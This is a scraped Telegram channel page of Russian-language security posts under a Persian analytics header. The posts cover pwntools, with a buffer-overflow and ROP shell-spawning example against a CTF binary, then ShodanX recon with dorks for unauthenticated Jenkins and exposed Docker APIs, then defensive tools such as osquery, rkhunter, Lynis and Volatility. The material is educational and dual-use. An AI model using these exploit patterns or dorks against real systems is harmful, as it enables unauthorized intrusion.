CodeGuard: PySec Edition
Канал по ИБ и этичному хакингу. Автор: @Arakcheev_Ruslan Ссылка: @invite_CodeGuard Рекламный менеджер: @Diggsale Биржа: https://telega.in/c/+3X56uL4A-UM3Njgy
نمایش بیشتر📈 تحلیل کانال تلگرام CodeGuard: PySec Edition
کانال CodeGuard: PySec Edition بازیگری فعال است. در حال حاضر جامعه شامل 14 097 مشترک است و جایگاه 8 760 را در دسته فناوری و برنامهها و رتبه 45 869 را در منطقه روسيا دارد.
📊 شاخصهای مخاطب و پویایی
از زمان ایجاد در невідомо، پروژه رشد سریعی داشته و 14 097 مشترک جذب کرده است.
بر اساس آخرین دادهها در تاریخ 26 سپتامبر, 2026، کانال فعالیت پایداری دارد. در ۳۰ روز گذشته تغییر اعضا برابر 821 و در ۲۴ ساعت گذشته برابر 0 بوده و همچنان دسترسی گستردهای حفظ شده است.
- وضعیت تأیید: تأیید نشده
- نرخ تعامل (ER): میانگین تعامل مخاطب 9.98% است و در ۲۴ ساعت نخست پس از انتشار، محتوا معمولاً 5.58% واکنش نسبت به کل مشترکان کسب میکند.
- دسترسی پستها: هر پست به طور میانگین 1 407 بازدید دریافت میکند. در اولین روز معمولاً 786 بازدید جمعآوری میشود.
- واکنشها و تعامل: مخاطبان بهطور فعال حمایت میکنند؛ میانگین واکنش به هر پست 8 است.
- علایق موضوعی: محتوا بر موضوعات کلیدی مانند codeguard, pysec, docker, grep, контейнер تمرکز دارد.
📝 توضیح و سیاست محتوایی
نویسنده این فضا را محل بیان دیدگاههای شخصی توصیف میکند:
“Канал по ИБ и этичному хакингу.
Автор: @Arakcheev_Ruslan
Ссылка: @invite_CodeGuard
Рекламный менеджер: @Diggsale
Биржа: https://telega.in/c/+3X56uL4A-UM3Njgy”
به لطف بهروزرسانیهای پرتکرار (آخرین داده در تاریخ 27 سپتامبر, 2026)، کانال همواره بهروز و دارای دسترسی بالاست. تحلیلها نشان میدهد مخاطبان بهطور فعال با محتوا تعامل دارند و آن را به نقطه اثرگذاری مهم در دسته فناوری و برنامهها تبدیل کردهاند.
▶️ CTF-мод — автоматизируем всё, что движется: от брута флагов до ROP-цепочек Шеллкод на коленке — генерируем, пакуем и тестим без лишних телодвижений ▶️ Работа с бинарником — ищем гаджеты, дырявим GOT/PLT, дизлайбим либы ▶️ Сетевое общение — TCP/UDP, шелл, SSH — общаемся с жертвой как с другом ▶️ Дебёг как бог — GDB-интеграция, брейкпоинты, трассировка без слёз💻 Ставим эту магию (Python 3.6+ или иди нахуй):
pip install pwntools # если не сломалось — ты счастливчик
🚀 Быстрый старт (для тех, кто не любит читать мануалы):
Простой пример — подключиться к серверу и получить флаг:
from pwn import *
# Подключаемся к таске
conn = remote('ctf.example.com', 1337)
# Ждём приветствия
conn.recvuntil(b'Enter password:')
# Шлём наш гениальный эксплоит
conn.sendline(b'A' * 64 + p64(0x401152)) # переполнение буфера + адрес победы
# Получаем флаг и улыбаемся
print(conn.recvall().decode())
🛠 Продвинутые фишки (когда нужно выебать ядро):
ROP-цепочка для обхода DEP:
from pwn import *
context.binary = './vuln'
# Автоматически ищем гаджеты
rop = ROP(context.binary)
rop.execve(next(context.binary.search(b'/bin/sh')), 0, 0)
# Собираем полезную нагрузку
payload = flat(
b'A' * 64,
rop.chain()
)
# Отправляем и получаем шелл
io = process('./vuln')
io.sendline(payload)
io.interactive() # welcome to root!
Интеграция с GDB (для параноиков):
io = gdb.debug('./vuln', gdbscript='''
break *main+0x42
continue
''')
# Смотрим дамп памяти после краша
io.wait()
core = io.corefile
print(hex(core.rsp)) # где упал — там и ищи сокровища
📌 Когда использовать эту хрень:
🔴 CTF — если надоело вручную собирать эксплоиты 🔴 Баг-баунти — тестируем веб-сервисы на устойчивость к пиздецу 🔴 Образование — учимся эксплоитингу без скучных мануалов 🔴 Исследования — разбираемся, как ломаются бинарники вживую⚠️Предупреждение (шоб мусора не навести):
🔵Используй только на своих тасках или с разрешения владельца 🔵Не забывай про context.log_level = 'debug' — иногда полезно увидеть, что там внутри творится 🔵Если эксплоит не работает — это не баг, это фича. Перечитай доки.💡 Совет: Начни с локальных бинарников из CTF-тасок — так безопаснее и проще понять, как эта бандура работает. А потом уже можно и на реальные цели переходить (если разрешили, конечно). 😈 CodeGuard: PySec Edition | Чат
▶️ Модульная разведка — 15+ специализированных команд для доменов, поддоменов, SSL, организаций ▶️ Работа с базами Shodan — доступ к CVE Database, EntityDB, ExposureDB, FaviconMap ▶️ Визуализация данных — географическое отображение (map) exposed-сервисов по миру ▶️ Расширенные запросы — поддержка кастомных dorks и фильтров Shodan ▶️ Пассивное обнаружение — поиск поддоменов через DNS-данные Shodan без прямого взаимодействия с целью ▶️ Интеграция с InternetDB — быстрый анализ IP и доменов через lightweight API Shodan✨ Быстрый старт с ShodanX: Установка (требуется Python 3.13+):
pip install git+https://github.com/RevoltSecurities/ShodanX --break-system-packages
Первоначальная настройка:
# 1. Сохраняем API-ключ Shodan
shodanx auth
# 2. Логин через session cookie (для премиум-функций)
shodanx login
# Куки копируем из DevTools: .shodan.io → session
# 3. Проверяем доступ
shodanx login
Базовые команды разведки:
# Разведка по домену (порты, хосты, метаданные)
shodanx domain example.com
# Пассивный поиск поддоменов
shodanx subdomain example.com
# Поиск по SSL-отпечатку (tracking reused certs)
shodanx ssl <sha1_fingerprint>
# Организационный поиск (использование facets)
shodanx org "Company Name"
# Поиск уязвимых систем через CVE
shodanx cvedb CVE-2024-12345
🔍 Продвинутые сценарии:
Географическая визуализация exposed-сервисов:
# Требуется премиум-подписка Shodan
shodanx map "port:22 country:RU"
Кастомные dorks для bug bounty:
# Поиск Jenkins без аутентификации
shodanx custom 'http.component:jenkins "200 OK"'
# Поиск открытых Docker API
shodanx custom 'product:docker port:2375'
Трекинг инфраструктуры через favicon:
# Поиск систем по уникальному фавикону
shodanx faviconmap <favicon_hash>
📌 Когда использовать ShodanX:
🔴 Расширение атакуемой поверхности — автоматический поиск забытых сервисов и поддоменов
🔴 Подготовка к внешнему пентесту — разведка открытых портов и технологий цели
🔴 Threat Intelligence — мониторинг эксплойтов в дикой природе через CVE-привязку
🔴 Исследование IoT/инфраструктуры — картографирование сетей по организациям и странам
🔴 Расследование инцидентов — поиск следов компрометации в открытых источниках
🛠 Интеграция в пайплайн:
# Пример скрипта для автоматической разведки
#!/bin/bash
DOMAIN=$1
echo "[*] Starting ShodanX reconnaissance for $DOMAIN"
shodanx domain $DOMAIN > domain_scan.json
shodanx subdomain $DOMAIN > subdomains.txt
shodanx ssl $(get_ssl_fingerprint $DOMAIN) > ssl_assets.json
# Дальнейшая обработка через jq, grep и т.д.
⚠️ Требования и ограничения:
🔴 API-ключ Shodan обязателен (бесплатный аккаунт — 100 запросов/месяц)
🔴 Session cookie нужен для функций map и trends (премиум-подписка)
🔴 Shodan Enterprise требуется для модуля trends (анализ исторических данных)
🔴 Python 3.13+ — более старые версии не поддерживаются
📌 Ссылка на репозиторий
💡 Совет: Начните с бесплатного API-ключа Shodan, чтобы оценить возможности. Для серьезной работы потребуется платная подписка ($59/месяц), но даже бесплатный лимит позволяет проводить точечную разведку.
😈 CodeGuard: PySec Edition | Чат🔵Разведка и картография 🔵Социальная инженерия 🔵Скрытность и импланты 🔵Защита от атрибуцииНравятся книга? ❤️ — Да 🔥 — Нет 👩💻 Кликай и качай 😈 CodeGuard: PySec Edition | Чат
🟢 Декомпиляция в читаемый псевдокод 🟢Анализ ELF / PE / Mach‑O 🟢 Автоматизация и скрипты 🟢Кроссплатформенность 🟢 Open Source от NSA🧠 Зачем она нужна
➡️ Реверс-инжиниринг и аудит безопасности ➡️Анализ вредоносного ПО ➡️ Изучение low‑level логики ➡️ Обучение и практика ➡️ Бесплатная альтернатива IDA Pro🧪 Использование из терминала Запуск Ghidra:
./ghidraRun
Анализ бинарника в headless‑режиме (без GUI):
./analyzeHeadless ~/ghidra_projects test_project \
-import ./binary \
-analysisTimeoutPerFile 60
Запуск анализа с авто‑декомпиляцией:
./analyzeHeadless ~/ghidra_projects test_project \
-import ./binary \
-postScript DecompileAllFunctions.java
Удаление проекта:
rm -rf ~/ghidra_projects/test_project
🔗 Исходники
😈 CodeGuard: PySec Edition | Чат🔹 Хакер или инсайдер 🔹 Вредоносное ПО 🔹 Фишинг 🔹 Ошибка администратора 🔹 Пожар, отключение электричестваУгроза сама по себе ещё ничего не ломает — она лишь существует. 🔸 Vulnerability (Уязвимость) Уязвимость — это слабое место, через которое угроза может реализоваться. Примеры:
🔹 Необновлённый софт 🔹 Пароль admin123 🔹 Открытый S3-бакет 🔹 Отсутствие MFA 🔹 Лишние права у пользователяУязвимость без угрозы — просто дефект. Угроза без уязвимости — почти бесполезна. ⚠️ Risk (Риск) Риск — это вероятность + ущерб, если угроза использует уязвимость. Примеры:
🔹 Утечка ПДн клиентов 🔹 Простой сервиса 🔹 Штрафы и репутационные потери 🔹 Потеря интеллектуальной собственностиВ ИБ борются не с угрозами, а с рисками. 🧠 Как это связано?
🔴 Угроза — кто или что может атаковать 🔵 Уязвимость — через что могут атаковать ⏺ Риск — что будет, если это случитсяЕсли по-простому:
➡️ Патч закрывает уязвимость ➡️ Антивирус снижает влияние угрозы ➡️ Бизнес решает, какой риск допустим😈 CodeGuard: PySec Edition | Чат
🟢 нужен контроль и видимость, а не разовый чек 🟢 важно ловить аномалии, а не только известные сигнатуры 🟢 сервер/хост живёт долго и меняется со временем 🟢 хочется гибкую основу под security-мониторинг⚙️ Ключевые возможности osquery:
🔵 Доступ к процессам, файлам, сокетам, пользователям через SQL 🔵 Поиск подозрительных бинарей, автозапусков, cron-задач 🔵 Мониторинг сетевых соединений и открытых портов 🔵 Scheduled queries + логирование изменений 🔵 Интеграция с SIEM, Elastic, Fleet, Loki и др.⚡️ Примеры реальных запросов:
-- Все процессы, слушающие сеть
SELECT pid, name, local_port FROM listening_ports;
-- Подозрительные cron-задачи
SELECT * FROM crontab WHERE command NOT LIKE '%/usr%';
-- Новые бинарники в /tmp
SELECT * FROM file WHERE path LIKE '/tmp/%';
📌 Что реально помогает найти:
🟢 скрытые persistence-механизмы 🟢 нелегитимные сетевые соединения 🟢 странные cron / systemd-юниты 🟢 появление новых пользователей и ключей 🟢 медленные, «тихие» компрометацииГде osquery раскрывается:
🔴 Прод-сервера и VPS 🔴 Хосты с долгим аптаймом 🔴 SOC / blue team / IR 🔴 В связке с rkhunter, AIDE, Wazuh 🔴 Как основа для кастомного security-мониторинга😈 CodeGuard: PySec Edition | Чат
🟢 нужен более тщательный аудит, чем «разок проверить» 🟢 важно отслеживать изменения системы со временем 🟢 сервер живёт долго и не должен удивлять сюрпризами 🟢 хочется early-warning, а не post-mortem⚙️ Ключевые возможности rkhunter:
🔵 Поиск известных руткитов, бэкдоров и локальных эксплойтов 🔵 Проверка системных бинарников по хешам 🔵 Анализ прав доступа и опасных конфигураций 🔵 Детект скрытых файлов, процессов и сетевых аномалий 🔵 Логи + режим регулярного cron-сканирования⚡️ Быстрый старт с rkhunter: Установка:
sudo apt install rkhunter # Debian/Ubuntu
sudo dnf install rkhunter # RHEL/CentOS
Обновление сигнатур:
sudo rkhunter --update
Первичное сканирование:
sudo rkhunter --check
📌 Что реально находит:
🟢 подмену системных утилит (ls, ps, netstat и др.) 🟢 подозрительные права на важные файлы 🟢 следы популярных руткитов и бэкдоров 🟢 небезопасные настройки SSH, cron, sysctl 🟢 аномалии, появившиеся после взломаГде использовать rkhunter:
🔴 Долгоживущие прод‑серверы 🔴 VPS с публичным доступом 🔴 Регулярный security‑мониторинг через cron 🔴 В связке с Chkrootkit, Lynis, AIDE 🔴 Как система раннего оповещения, а не «после пожара»😈 CodeGuard: PySec Edition | Чат
🟢 нужно быстро проверить сервер без установки агентов 🟢 важен простой аудит безопасности 🟢 хочется понять, не скрываются ли в системе угрозы⚙️ Ключевые возможности Chkrootkit:
🔵 Проверка известных руткитов и троянов 🔵 Сканирование системных процессов и модулей ядра 🔵 Поиск подозрительных бэкендов inetd, sshd, cron 🔵 Проверка ключевых бинарников на модификации 🔵 Лёгкий, работает без сети и демонов⚡️ Быстрый старт с Chkrootkit: Установка:
sudo apt install chkrootkit # Debian/Ubuntu
sudo dnf install chkrootkit # RHEL/CentOS
Запуск сканирования:
sudo chkrootkit
📌 Что реально находит:
🟢 скрытые процессы и демоны 🟢 подменённые системные бинарники 🟢 следы популярных руткитов 🟢 подозрительные сетевые подключения 🟢 эксплойты локальных сервисовГде использовать Chkrootkit:
🔴 Быстрый security-чек на прод-серверах 🔴 Регулярные проверки VPS и домашних серверов 🔴 В связке с Lynis, AIDE или auditd 🔴 Как baseline перед детальным pentest’ом😈 CodeGuard: PySec Edition | Чат
🔵Поддержка ELF, PE, Mach-O 🔵x86, x64, ARM, MIPS 11 движков декомпиляции одновременно 🔵Сравнение выхода side-by-side 🔵Шаринг результатов по ссылке 🔵Бесплатно, без регистрации💡Почему стоит в закладки:
🔴Один декомпилятор выдал мусор - другой справился 🔴Не нужно ставить тяжёлые тулзы локально 🔴Быстрый анализ CTF-тасков 🔴Видишь как разные инструменты интерпретируют один код 🔴Учишься понимать, какой декомпилятор лучше для чегоТипичный юзкейс: Скачал подозрительный
.exe или получил бинарь на CTF. Закинул в Dogbolt - через минуту читаешь псевдо-C код из 11 источников. Ghidra показал undefined4? Binary Ninja уже распознал структуру.
Незаменим для reverse engineering, malware analysis и когда IDA тупит.
⭐️Сервис
😈 CodeGuard: PySec Edition | Чат🟢 нужен быстрый security-чек без агентов 🟢 важно понять реальный уровень hardening 🟢 система уже в проде и ломать ничего нельзя⚙️ Ключевые возможности Lynis:
🔵 Глубокий аудит конфигурации ОС 🔵 Проверка прав, сервисов, kernel-настроек 🔵 Анализ SSH, PAM, cron, logging, firewall 🔵 Security score + конкретные рекомендации 🔵 Работает локально, без демонов и сети⚡️ Быстрый старт с Lynis: Установка:
sudo apt install lynis # Debian/Ubuntu
sudo dnf install lynis # RHEL/CentOS
Запуск аудита:
sudo lynis audit system
Отчёты:
/var/log/lynis.log
/var/log/lynis-report.dat
📌 Что реально находит:
🟢 слабые SSH-настройки 🟢 небезопасные kernel-параметры 🟢 лишние сервисы и демоны 🟢 проблемы с правами и логированием 🟢 плохие практики hardeningГде использовать Lynis:
🔴 Быстрый аудит перед продом 🔴 Регулярные security-чеки серверов 🔴 Hardened-хосты и VPS 🔴 В связке с AIDE / auditd / SIEM 🔴 Как baseline перед pentest’ом😈 CodeGuard: PySec Edition | Чат
git clone https://github.com/volatilityfoundation/volatility3.git
cd volatility3
pip3 install -r requirements.txt
Базовые команды анализа Windows дампа:
# Определение профиля ОС
python3 vol.py -f memory.dmp windows.info
# Список процессов
python3 vol.py -f memory.dmp windows.pslist
# Поиск скрытых процессов (Direct Kernel Object Manipulation)
python3 vol.py -f memory.dmp windows.psscan
# Анализ сетевых соединений
python3 vol.py -f memory.dmp windows.netscan
# Дамп процесса для дальнейшего анализа
python3 vol.py -f memory.dmp windows.dumpfiles --pid 1234
🕵️♂️ Практические сценарии расследований:
1. Обнаружение файлового малвари (ransomware):
# Поиск процессов с подозрительными характеристиками
python3 vol.py -f ransom.dmp windows.malfind --pid 1337
# Анализ инжектированного кода
python3 vol.py -f ransom.dmp windows.vadinfo --pid 1337
# Дамп и анализ payload
python3 vol.py -f ransom.dmp windows.dumpfiles --pid 1337 --phys
2. Расследование атаки через PowerShell:
# Поиск следов PowerShell в памяти
python3 vol.py -f attack.dmp windows.cmdline | grep -i powershell
# Анализ .NET сборок в памяти
python3 vol.py -f attack.dmp windows.dlllist | findstr -i clr
# Извлечение скриптов из памяти процесса
python3 vol.py -f attack.dmp windows.memdump --pid 5678 --dump-dir ./output
3. Обнаружение rootkit'ов и скрытых драйверов:
# Список загруженных драйверов
python3 vol.py -f infected.dmp windows.modules
# Поиск скрытых драйверов
python3 vol.py -f infected.dmp windows.driverscan
# Анализ SSDT hooks (перехват системных вызовов)
python3 vol.py -f infected.dmp windows.ssdt
🔍 Расширенные техники:
Анализ Linux систем:
# Просмотр загруженных модулей ядра
python3 vol.py -f linux_memory.dmp linux.check_modules
# Поиск скрытых TCP соединений
python3 vol.py -f linux_memory.dmp linux.netstat
# Анализ процессов в userland
python3 vol.py -f linux_memory.dmp linux.pslist
Работа с macOS:
# Анализ процессов Mac
python3 vol.py -f mac_memory.dmp mac.pslist
# Поиск инжектированных библиотек
python3 vol.py -f mac_memory.dmp mac.libraries
⚠️ Сложные случаи:
🔴 Анализ защищенных процессов — Protected Processes в Windows
🔴 Обход анти-форензик техник — малвари, специально затирающие следы в памяти
🔴 Анализ виртуальных машин — дампы памяти из VMware/Hyper-V
🔴 Работа с поврежденными дампами — восстановление структур данных
📌 Когда использовать Volatility:
🔴 Инцидент-респонс — быстрое понимание масштаба компрометации
🔴 Расследование APT-атак — поиск продвинутых техник уклонения
🔴 Анализ малвари — изучение поведения в памяти
🔴 Цифровая криминалистика — сбор доказательств
🔴 Red Team — проверка устойчивости к анализу памяти
😈 CodeGuard: PySec Edition | Чат